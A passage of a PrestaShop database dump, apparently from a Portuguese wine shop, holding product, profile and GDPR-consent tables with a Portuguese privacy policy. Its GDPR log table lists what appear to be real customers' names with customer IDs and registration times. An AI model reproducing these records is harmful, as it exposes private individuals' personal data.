-- Table structure for table `ps_product_sale`
--

CREATE TABLE `ps_product_sale` (
  `id_product` int(10) UNSIGNED NOT NULL,
  `quantity` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `sale_nbr` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `date_upd` date DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_product_sale`
--

INSERT INTO `ps_product_sale` (`id_product`, `quantity`, `sale_nbr`, `date_upd`) VALUES
(22, 1, 1, '2022-03-16'),
(23, 4, 2, '2021-03-22'),
(24, 3, 2, '2021-10-14'),
(25, 1, 1, '2022-03-16'),
(36, 4, 3, '2022-04-27'),
(39, 1, 1, '2021-10-26'),
(43, 7, 4, '2022-08-22'),
(44, 2, 2, '2022-03-16'),
(45, 5, 2, '2021-05-31'),
(62, 1, 1, '2023-11-07'),
(78, 3, 2, '2024-10-25'),
(79, 1, 1, '2024-02-22'),
(80, 1, 1, '2024-02-22');

-- --------------------------------------------------------

--
-- Table structure for table `ps_product_shop`
--

CREATE TABLE `ps_product_shop` (
  `id_product` int(10) UNSIGNED NOT NULL,
  `id_shop` int(10) UNSIGNED NOT NULL,
  `id_category_default` int(10) UNSIGNED DEFAULT NULL,
  `id_tax_rules_group` int(11) UNSIGNED NOT NULL,
  `on_sale` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `online_only` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `ecotax` decimal(17,6) NOT NULL DEFAULT '0.000000',
  `minimal_quantity` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `low_stock_threshold` int(10) DEFAULT NULL,
  `low_stock_alert` tinyint(1) NOT NULL DEFAULT '0',
  `price` decimal(20,6) NOT NULL DEFAULT '0.000000',
  `wholesale_price` decimal(20,6) NOT NULL DEFAULT '0.000000',
  `unity` varchar(255) DEFAULT NULL,
  `unit_price_ratio` decimal(20,6) NOT NULL DEFAULT '0.000000',
  `additional_shipping_cost` decimal(20,2) NOT NULL DEFAULT '0.00',
  `customizable` tinyint(2) NOT NULL DEFAULT '0',
  `uploadable_files` tinyint(4) NOT NULL DEFAULT '0',
  `text_fields` tinyint(4) NOT NULL DEFAULT '0',
  `active` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `redirect_type` enum('','404','301-product','302-product','301-category','302-category') NOT NULL DEFAULT '',
  `id_type_redirected` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `available_for_order` tinyint(1) NOT NULL DEFAULT '1',
  `available_date` date DEFAULT NULL,
  `show_condition` tinyint(1) NOT NULL DEFAULT '1',
  `condition` enum('new','used','refurbished') NOT NULL DEFAULT 'new',
  `show_price` tinyint(1) NOT NULL DEFAULT '1',
  `indexed` tinyint(1) NOT NULL DEFAULT '0',
  `visibility` enum('both','catalog','search','none') NOT NULL DEFAULT 'both',
  `cache_default_attribute` int(10) UNSIGNED DEFAULT NULL,
  `advanced_stock_management` tinyint(1) NOT NULL DEFAULT '0',
  `date_add` datetime NOT NULL,
  `date_upd` datetime NOT NULL,
  `pack_stock_type` int(11) UNSIGNED NOT NULL DEFAULT '3'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_product_shop`
--

INSERT INTO `ps_product_shop` (`id_product`, `id_shop`, `id_category_default`, `id_tax_rules_group`, `on_sale`, `online_only`, `ecotax`, `minimal_quantity`, `low_stock_threshold`, `low_stock_alert`, `price`, `wholesale_price`, `unity`, `unit_price_ratio`, `additional_shipping_cost`, `customizable`, `uploadable_files`, `text_fields`, `active`, `redirect_type`, `id_type_redirected`, `available_for_order`, `available_date`, `show_condition`, `condition`, `show_price`, `indexed`, `visibility`, `cache_default_attribute`, `advanced_stock_management`, `date_add`, `date_upd`, `pack_stock_type`) VALUES
(22, 1, 2, 15, 1, 0, 0.000000, 1, NULL, 0, 37.168142, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 21:51:04', '2024-02-09 19:35:29', 3),
(23, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 10.619469, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 22:37:16', '2024-02-09 16:40:33', 3),
(24, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 13.274336, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 22:48:39', '2023-04-17 19:54:54', 3),
(25, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 15.486726, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 22:51:44', '2024-05-10 16:51:08', 3),
(26, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 48.672566, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 22:54:13', '2024-02-09 16:40:38', 3),
(27, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 44.247788, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 22:56:43', '2022-09-19 21:18:07', 3),
(28, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 123.238938, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 22:59:04', '2022-01-06 13:59:12', 3),
(29, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 72.053097, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 23:04:15', '2022-01-06 13:59:14', 3),
(30, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 56.814159, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 23:06:33', '2022-01-06 13:59:27', 3),
(31, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 45.663717, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 23:08:44', '2022-01-06 13:59:22', 3),
(36, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 26.548673, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 23:13:20', '2024-02-09 16:40:44', 3),
(37, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 102.371681, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 23:15:30', '2022-01-06 13:59:35', 3),
(39, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 88.495575, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-14 23:22:14', '2023-08-23 12:32:29', 3),
(41, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 26.548673, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-15 20:22:30', '2024-02-09 16:40:49', 3),
(42, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 24.778761, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-15 20:34:49', '2024-02-09 16:40:54', 3),
(43, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 41.592920, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-15 20:39:22', '2024-02-22 16:08:13', 3),
(44, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 25.663717, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-15 20:47:21', '2024-02-09 19:40:00', 3),
(45, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 16.814159, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-15 20:50:56', '2024-05-10 16:50:58', 3),
(46, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 22.123894, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2020-11-15 20:58:44', '2024-02-09 19:47:34', 3),
(51, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 113.787611, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-02-01 15:10:54', '2024-02-09 19:47:34', 3),
(52, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 106.194690, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-02-01 15:27:06', '2024-02-09 19:47:34', 3),
(53, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 66.371680, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-02-01 16:05:14', '2024-02-09 19:47:34', 3),
(54, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 132.743361, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-02-01 16:16:47', '2024-02-09 19:47:34', 3),
(55, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 94.884956, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-02-01 16:20:39', '2024-02-09 19:47:34', 3),
(56, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 123.893805, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-04-12 11:04:16', '2024-02-09 19:47:34', 3),
(57, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 132.743361, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-04-12 11:28:37', '2024-02-09 19:47:34', 3),
(59, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 84.070796, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-04-12 11:38:39', '2024-02-09 19:47:34', 3),
(60, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 77.433628, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-04-12 11:53:11', '2024-02-09 19:47:34', 3),
(61, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 49.557522, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 0, 'both', 0, 0, '2021-04-12 19:48:44', '2024-02-09 19:47:34', 3),
(62, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 53.097345, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-04-12 19:51:16', '2024-02-09 19:47:34', 3),
(63, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 33.628319, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-04-12 19:53:14', '2024-02-09 19:47:34', 3),
(64, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 30.973451, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-04-12 19:54:39', '2024-02-09 19:47:34', 3),
(65, 1, 2, 15, 1, 1, 0.000000, 1, NULL, 0, 0.000000, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 0, '0000-00-00', 0, 'new', 0, 1, 'both', 0, 0, '2021-04-19 20:40:46', '2024-02-09 19:47:34', 3),
(67, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 39.823009, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2021-11-19 19:16:50', '2024-02-09 19:47:34', 3),
(69, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 78.761062, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2022-09-20 11:50:56', '2024-02-09 19:47:34', 3),
(71, 1, 2, 1, 0, 0, 0.000000, 1, NULL, 0, 16.260162, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2023-08-23 11:08:40', '2024-09-17 11:30:00', 3),
(72, 1, 11, 15, 0, 0, 0.000000, 1, NULL, 0, 26.548673, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 0, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2023-08-23 11:12:30', '2024-09-17 11:21:46', 3),
(73, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 16.814159, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-02-09 17:44:51', '2024-02-22 16:24:41', 3),
(74, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 21.238938, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-02-09 18:08:57', '2024-02-22 16:31:00', 3),
(76, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 23.008850, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-02-09 18:19:11', '2024-02-22 16:35:21', 3),
(77, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 37.168142, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-02-09 18:22:22', '2024-02-22 16:40:23', 3),
(78, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 41.592920, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-02-09 18:32:21', '2024-02-22 16:43:52', 3),
(79, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 26.548673, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-02-09 18:42:37', '2024-02-22 16:45:40', 3),
(80, 1, 18, 15, 0, 0, 0.000000, 1, NULL, 0, 22.123894, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-02-09 18:50:30', '2024-02-22 16:19:43', 3),
(81, 1, 2, 15, 0, 0, 0.000000, 1, NULL, 0, 26.548673, 0.000000, '', 0.000000, 0.00, 0, 0, 0, 1, '301-category', 0, 1, '0000-00-00', 0, 'new', 1, 1, 'both', 0, 0, '2024-04-12 10:44:11', '2024-09-17 11:31:41', 3);

-- --------------------------------------------------------

--
-- Table structure for table `ps_product_supplier`
--

CREATE TABLE `ps_product_supplier` (
  `id_product_supplier` int(11) UNSIGNED NOT NULL,
  `id_product` int(11) UNSIGNED NOT NULL,
  `id_product_attribute` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `id_supplier` int(11) UNSIGNED NOT NULL,
  `product_supplier_reference` varchar(64) DEFAULT NULL,
  `product_supplier_price_te` decimal(20,6) NOT NULL DEFAULT '0.000000',
  `id_currency` int(11) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_product_tag`
--

CREATE TABLE `ps_product_tag` (
  `id_product` int(10) UNSIGNED NOT NULL,
  `id_tag` int(10) UNSIGNED NOT NULL,
  `id_lang` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_profile`
--

CREATE TABLE `ps_profile` (
  `id_profile` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_profile`
--

INSERT INTO `ps_profile` (`id_profile`) VALUES
(1),
(2),
(3),
(4);

-- --------------------------------------------------------

--
-- Table structure for table `ps_profile_lang`
--

CREATE TABLE `ps_profile_lang` (
  `id_lang` int(10) UNSIGNED NOT NULL,
  `id_profile` int(10) UNSIGNED NOT NULL,
  `name` varchar(128) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_profile_lang`
--

INSERT INTO `ps_profile_lang` (`id_lang`, `id_profile`, `name`) VALUES
(1, 1, 'SuperAdministrador'),
(2, 1, 'SuperAdmin'),
(1, 2, 'Operador de logística'),
(2, 2, 'Logistician'),
(1, 3, 'Tradutor'),
(2, 3, 'Translator'),
(1, 4, 'Vendedor'),
(2, 4, 'Salesman');

-- --------------------------------------------------------

--
-- Table structure for table `ps_psgdpr_consent`
--

CREATE TABLE `ps_psgdpr_consent` (
  `id_gdpr_consent` int(10) UNSIGNED NOT NULL,
  `id_module` int(10) UNSIGNED NOT NULL,
  `active` int(10) NOT NULL,
  `error` int(10) DEFAULT NULL,
  `error_message` text,
  `date_add` datetime NOT NULL,
  `date_upd` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_psgdpr_consent`
--

INSERT INTO `ps_psgdpr_consent` (`id_gdpr_consent`, `id_module`, `active`, `error`, `error_message`, `date_add`, `date_upd`) VALUES
(1, 1, 1, 0, '', '2020-11-14 23:47:32', '2021-08-23 14:06:28'),
(2, 17, 0, 0, '', '2020-11-14 23:47:32', '2021-08-23 14:06:28'),
(3, 113, 1, 0, '', '2021-12-29 23:15:48', '2021-12-29 23:15:48');

-- --------------------------------------------------------

--
-- Table structure for table `ps_psgdpr_consent_lang`
--

CREATE TABLE `ps_psgdpr_consent_lang` (
  `id_gdpr_consent` int(10) UNSIGNED NOT NULL,
  `id_lang` int(10) UNSIGNED NOT NULL,
  `message` text,
  `id_shop` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_psgdpr_consent_lang`
--

INSERT INTO `ps_psgdpr_consent_lang` (`id_gdpr_consent`, `id_lang`, `message`, `id_shop`) VALUES
(1, 1, '<p><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Ao aceder e usar este Website o Utilizador admite ter lido, compreendido e aceite estes termos e condições. </span></span></p>\n<p><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">O Website da ACV - Produção e Comércio de Vinhos de Talha, Lda não recolhe automaticamente qualquer tipo de informação pessoal dos utilizadores que não se encontrem registados, permitindo assim que os visitantes naveguem anonimamente, contudo, no âmbito desta Política de Privacidade, a disponibilização dos seus dados pessoais implica o conhecimento e aceitação das condições aqui constantes, pelo que o aconselhamos a ler a mesma.</span></span></p>\n<p></p>\n<h1><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Idade Legal para Consumo de Bebidas Alcoólicas </span></span></h1>\n<p><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\"> Ao fazer o registo, declaro que tenho idade legal para o consumo de bebidas alcoólicas no meu país.</span></span></p>\n<p></p>\n<h1><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Política de privacidade</span></span></h1>\n<div>\n<div class=\"InlineEditor\" id=\"Text23543320\">\n<h2><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">I - Protecção de dados pessoais</span></span></h2>\n<div>A ACV - Vinhos de Talha assume um compromisso de privacidade e segurança dos dados pessoais de cada cliente, sendo estes apenas utilizados pela ACV - Vinhos de Talha para o processamento das suas encomendas. Em nenhuma circunstância forneceremos os dados dos nossos clientes a outras entidades.</div>\n<div> </div>\n<div>Todos os dados inseridos pelos utilizadores deste site são guardados de forma segura e utilizados unicamente para comunicações institucionais e comerciais da ACV - Vinhos de Talha. Os utilizadores poderão, em qualquer momento, cancelar o envio destas comunicações, se e quando o desejarem.</div>\n<div> </div>\n<div> </div>\n<h2>II - Tratamento e acesso aos dados pessoais</h2>\n<div>O tratamento de dados pessoais é da responsabilidade da ACV - Produção e Comércio de Vinhos de Talha, Lda, com sede na Rua Frei Amador Arrais - Loja 4 9 Beja 7800-491 Beja, e com o NIF/NIPC 513442340.</div>\n<div> </div>\n<div>Nos termos da lei nº 67/98 de 26 de Outubro, é garantido ao utilizador o direito de acesso aos seus dados e respectiva rectificação. O utilizador pode fazê-lo contactando-nos através do email geral@vinhodetalha.pt.</div>\n<div> </div>\n<h2>III - Área de cliente</h2>\n<div>Pode aceder aos seus dados pessoais e ao seu histórico de encomendas através da sua Área de Cliente, acessível através do LOGIN no topo do site.</div>\n<div> </div>\n<div>Esta palavra-passe existe unicamente para seu uso pessoal neste site, e deve memorizá-la ou mantê-la num local seguro, de forma a não comprometer a privacidade dos seus dados.</div>\n<div> </div>\n<div> </div>\n<h2><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">IV - Cookies</span></span></h2>\n<div><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Este site utiliza cookies, que são dados trocados entre o browser e o servidor, que permitem acompanhar parte da actividade do utilizador no site.</span></span></div>\n<div> </div>\n<div><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Estes cookies servem apenas para melhorar a experiência do utilizador e para as nossas estatísticas internas, não sendo utilizados para quaisquer outros fins.</span></span></div>\n</div>\n</div>', 1),
(1, 2, '', 1),
(2, 1, '<p><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Ao aceder e usar este Website o Utilizador admite ter lido, compreendido e aceite estes termos e condições. </span></span></p>\n<p><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">O Website da ACV - Produção e Comércio de Vinhos de Talha, Lda não recolhe automaticamente qualquer tipo de informação pessoal dos utilizadores que não se encontrem registados, permitindo assim que os visitantes naveguem anonimamente, contudo, no âmbito desta Política de Privacidade, a disponibilização dos seus dados pessoais implica o conhecimento e aceitação das condições aqui constantes, pelo que o aconselhamos a ler a mesma.</span></span></p>\n<p></p>\n<h1><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Idade Legal para Consumo de Bebidas Alcoólicas </span></span></h1>\n<p><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\"> Ao fazer o registo, declaro que tenho idade legal para o consumo de bebidas alcoólicas no meu país.</span></span></p>\n<p></p>\n<h1><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Política de privacidade</span></span></h1>\n<div>\n<div class=\"InlineEditor\" id=\"Text23543320\">\n<h2><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">I - Protecção de dados pessoais</span></span></h2>\n<div>A ACV - Vinhos de Talha assume um compromisso de privacidade e segurança dos dados pessoais de cada cliente, sendo estes apenas utilizados pela ACV - Vinhos de Talha para o processamento das suas encomendas. Em nenhuma circunstância forneceremos os dados dos nossos clientes a outras entidades.</div>\n<div> </div>\n<div>Todos os dados inseridos pelos utilizadores deste site são guardados de forma segura e utilizados unicamente para comunicações institucionais e comerciais da ACV - Vinhos de Talha. Os utilizadores poderão, em qualquer momento, cancelar o envio destas comunicações, se e quando o desejarem.</div>\n<div> </div>\n<div> </div>\n<h2>II - Tratamento e acesso aos dados pessoais</h2>\n<div>O tratamento de dados pessoais é da responsabilidade da ACV - Produção e Comércio de Vinhos de Talha, Lda, com sede na Rua Frei Amador Arrais - Loja 4 9 Beja 7800-491 Beja, e com o NIF/NIPC 513442340.</div>\n<div> </div>\n<div>Nos termos da lei nº 67/98 de 26 de Outubro, é garantido ao utilizador o direito de acesso aos seus dados e respectiva rectificação. O utilizador pode fazê-lo contactando-nos através do email geral@vinhodetalha.pt.</div>\n<div> </div>\n<h2>III - Área de cliente</h2>\n<div>Pode aceder aos seus dados pessoais e ao seu histórico de encomendas através da sua Área de Cliente, acessível através do LOGIN no topo do site.</div>\n<div> </div>\n<div>Esta palavra-passe existe unicamente para seu uso pessoal neste site, e deve memorizá-la ou mantê-la num local seguro, de forma a não comprometer a privacidade dos seus dados.</div>\n<div> </div>\n<div> </div>\n<h2><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">IV - Cookies</span></span></h2>\n<div><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Este site utiliza cookies, que são dados trocados entre o browser e o servidor, que permitem acompanhar parte da actividade do utilizador no site.</span></span></div>\n<div> </div>\n<div><span style=\"vertical-align:inherit;\"><span style=\"vertical-align:inherit;\">Estes cookies servem apenas para melhorar a experiência do utilizador e para as nossas estatísticas internas, não sendo utilizados para quaisquer outros fins.</span></span></div>\n</div>\n</div>', 1),
(2, 2, '', 1),
(3, 1, 'Enim quis fugiat consequat elit minim nisi eu occaecat occaecat deserunt aliquip nisi ex deserunt.', 1),
(3, 2, 'Enim quis fugiat consequat elit minim nisi eu occaecat occaecat deserunt aliquip nisi ex deserunt.', 1);

-- --------------------------------------------------------

--
-- Table structure for table `ps_psgdpr_log`
--

CREATE TABLE `ps_psgdpr_log` (
  `id_gdpr_log` int(10) UNSIGNED NOT NULL,
  `id_customer` int(10) UNSIGNED DEFAULT NULL,
  `id_guest` int(10) UNSIGNED DEFAULT NULL,
  `client_name` varchar(250) DEFAULT NULL,
  `id_module` int(10) UNSIGNED NOT NULL,
  `request_type` int(10) NOT NULL,
  `date_add` datetime NOT NULL,
  `date_upd` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_psgdpr_log`
--

INSERT INTO `ps_psgdpr_log` (`id_gdpr_log`, `id_customer`, `id_guest`, `client_name`, `id_module`, `request_type`, `date_add`, `date_upd`) VALUES
(1, 39, 0, 'Manuel Trindade', 0, 2, '2020-12-14 11:05:07', '2020-12-14 11:05:07'),
(2, 50, 0, 'ManuelG Trindade', 0, 1, '2021-03-02 10:26:30', '2021-03-02 10:26:30'),
(3, 51, 0, 'Helder Palma', 0, 1, '2021-03-03 11:18:36', '2021-03-03 11:18:36'),
(4, 52, 0, 'Helder Palma', 0, 1, '2021-03-03 11:22:05', '2021-03-03 11:22:05'),
(5, 53, 0, 'Manuelgg Trindade', 0, 1, '2021-03-03 11:26:23', '2021-03-03 11:26:23'),
(6, 59, 0, 'Manuel Trindade', 0, 1, '2021-03-14 11:40:52', '2021-03-14 11:40:52'),
(7, 60, 0, 'luis portugal', 0, 1, '2021-03-14 12:35:45', '2021-03-14 12:35:45'),
(8, 61, 0, 'Mariline Mota', 0, 1, '2021-03-16 10:35:26', '2021-03-16 10:35:26'),
(9, 62, 0, 'claudino nascimento', 0, 1, '2021-03-18 10:49:34', '2021-03-18 10:49:34'),
(10, 63, 0, 'Pedro Gomes', 0, 1, '2021-03-23 12:31:50', '2021-03-23 12:31:50'),
(11, 64, 0, 'ANA CABRAL', 0, 1, '2021-05-10 10:09:39', '2021-05-10 10:09:39'),
(12, 65, 0, 'Rui Gonçalves', 0, 1, '2021-05-31 10:20:49', '2021-05-31 10:20:49'),
(13, 66, 0, 'Manuel  Trindade', 0, 1, '2021-06-02 12:58:24', '2021-06-02 12:58:24'),
(14, 67, 0, 'Manuel Trindade', 0, 1, '2021-06-02 13:01:38', '2021-06-02 13:01:38'),
(15, 68, 0, 'Roberto Filippi', 0, 1, '2021-06-12 19:04:24', '2021-06-12 19:04:24'),
(16, 69, 0, 'Charles Aubeeluck', 0, 1, '2021-06-18 10:08:21', '2021-06-18 10:08:21'),
(17, 76, 0, 'Maria Celeste Isidro', 0, 1, '2021-08-23 12:08:55', '2021-08-23 12:08:55'),
(18, 78, 0, 'Araujo Manuel', 0, 1, '2021-09-07 19:32:22', '2021-09-07 19:32:22'),
